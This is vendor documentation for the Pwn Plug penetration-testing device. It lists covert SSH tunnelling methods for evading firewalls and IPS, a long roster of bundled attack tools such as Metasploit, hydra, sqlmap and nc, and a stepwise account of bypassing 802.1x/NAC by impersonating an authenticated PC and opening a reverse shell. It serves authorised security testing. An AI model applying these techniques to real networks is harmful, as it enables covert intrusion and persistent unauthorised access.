Product Documentation

Pwnie Express is committed to maintaining relevant and useful documentation for its products. Find the latest documentation below.

Enterprise Products

  • Citadel PX Manual (Request from Support)

Labs Products

Remote Access

plug-deployment_grande

 

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.

:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.

:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:

 

  • SSH over any TCP port
  • SSH over HTTP requests (appears as standard HTTP traffic)
  • SSH over SSL (appears as HTTPS)
  • SSH over DNS queries (appears as DNS traffic)
  • SSH over ICMP (appears as outbound pings)
  • SSH Egress Buster (top 10 common egress ports)
  • Out-of-band SSH over 3G/GSM cellular (Elite models)

 

Pwn Plug Toolkit

The following open source pentesting tools are included on all Pwn Plug / Power Pwn products. [repository here]

alive6
amap
amap6
arping
arp-scan
asp-auditor
bed
cisco-auditing-tool
cisco-global-exploiter
cms-explorer
cryptcat
DarkMySQLi
darkstat
denial6
detect-new-ip6
dmitry
dnsdict6
dnsenum
dnstracer
dos-new-ip6
dsniff
easy-creds
ettercap
exploit6
fake_advertise6
fake_dhcps6
fake_dnsupdate6
fake_mipv6
fake_mld26
fake_mld6
fake_mldrouter6
fake_router6
Fasttrack
fierce
fimap
flood_advertise6
flood_dhcpc6
flood_mld26
flood_mld6
flood_mldrouter6
flood_router6
flood_solicitate6
fping
fragmentation6
ftp
fuzz_ip6
goohost
gpsd
grabber
hping3
hydra
implementation6
iodine
ipcalc
john
kill_router6
lbd
mdk3
metagoofil
metasploit 4
miranda
miredo
nbtscan
nc
ndpexhaust6
netdiscover
nikto
nmap
onesixtyone
openssl
openvpn
parasite6
plecost
proxychains
proxytunnel
randicmp6
redir6
rsmurf6
scapy
sendpees6
sendpeesmp6
SET
sickfuzz
sipcrack
sipsak
sipvicious
skipfish
smtp-user-enum
smurf6
snmpcheck
snmpenum
socat
sqlbrute
sqlmap
sqlninja
ssldump
sslscan
sslsniff
sslstrip
tcptraceroute
telnet
thcping6
theharvester
tinyproxy
toobig6
trace6
ua-tester
udptunnel
voiper
waffit
wapiti
weevely
wifitap
wifite
wifizoo
xprobe2

NAC/802.1x Bypass

All aboard! Pwnie Express has done it again. In addition to supporting both 3G and Wireless connectivity, the Pwn Plug Elite can bypass virtually all NAC/802.1x/RADIUS implementations, providing a reverse shell backdoor and full connectivity to NAC-restricted networks!

How does it work?

  1. First, the Pwn Plug is placed in-line between an 802.1x-enabled client PC and a wall jack or switch.
  2. Using a modified layer 2 bridging module, the Pwn Plug transparently passes the 802.1x EAPOL authentication packets between the client PC and the switch.
  3. Once the 802.1x authentication completes, the switch grants connectivity to the network.
  4. The first outbound port 80 packet to leave the client PC provides the Pwn Plug with the PC’s MAC/IP address and default gateway.
  5. To avoid tripping the switch’s port security, the Pwn Plug then establishes a reverse SSH connection using the MAC and IP address of the already authenticated client PC.
  6. Once connected to the plug’s SSH console, you will have access to any internal subnets accessible by the client PC. As an added bonus, connections to other systems within the client PC’s local subnet will actually appear to source from the subnet’s local gateway!

NAC_Bypass